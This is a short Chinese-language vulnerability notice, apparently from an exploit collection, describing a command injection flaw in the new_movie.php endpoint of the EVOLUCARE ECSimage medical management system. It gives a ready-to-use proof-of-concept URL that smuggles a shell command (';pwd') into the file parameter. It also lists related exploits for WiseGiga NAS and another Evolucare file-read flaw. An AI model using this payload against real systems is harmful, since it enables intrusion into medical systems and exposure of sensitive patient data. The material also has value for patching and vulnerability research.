EVOLUCARE ECSimage是一款国外使用的医疗管理系统,研究发现其new_movie.php接口中存在命令注入漏洞,攻击者可利用该漏洞获取系统敏感信息等.
登录页面
验证POC
/new_movie.php?studyUID=1&start=2&end=2&file=1;pwd
WiseGiga NAS group.php 远程命令执行漏洞 Evolucare Ecsimaging downloadstatsdicom.php 任意文件读取漏洞
